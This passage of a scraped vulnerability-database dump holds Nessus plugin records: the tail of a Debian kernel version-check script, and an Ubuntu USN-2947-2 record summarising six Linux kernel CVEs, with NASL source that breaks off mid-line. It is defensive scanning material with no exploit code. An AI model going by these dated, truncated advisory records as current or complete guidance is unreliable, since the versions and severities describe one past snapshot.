flag++;\nif (deb_check(release:\"8.0\", prefix:\"speakup-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"speakup-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"squashfs-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"udf-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"uinput-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"uinput-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"uinput-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"uinput-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"uinput-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"uinput-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"uinput-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"uinput-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"uinput-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-serial-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"usb-storage-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"virtio-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xen-linux-system-3.16.0-4-amd64\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"xfs-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"zlib-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : deb_report_get()\n );\n exit(0);\n\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:54", "description": "Ralf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nIt was discovered that the extended Berkeley Packet Filter (eBPF) implementation in the Linux kernel did not correctly compute branch offsets for backward jumps after ctx expansion. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2016-2383)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-wily vulnerabilities (USN-2947-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7833", "CVE-2015-8812", "CVE-2016-2085", "CVE-2016-2383", "CVE-2016-2550", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2947-2.NASL", "href": "https://www.tenable.com/plugins/nessus/90403", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2947-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(90403);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2015-7833\", \"CVE-2015-8812\", \"CVE-2016-2085\", \"CVE-2016-2383\", \"CVE-2016-2550\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2947-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-wily vulnerabilities (USN-2947-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Ralf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the\nLinux Extended Verification Module (EVM). An attacker could use this\nto affect system integrity. (CVE-2016-2085)\n\nIt was discovered that the extended Berkeley Packet Filter (eBPF)\nimplementation in the Linux kernel did not correctly compute branch\noffsets for backward jumps after ctx expansion. A local attacker could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2016-2383)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted\nfile descriptors to the original opener for in-flight file descriptors\nsent over a unix domain socket. A local attacker could use this to\ncause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2947-2/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar 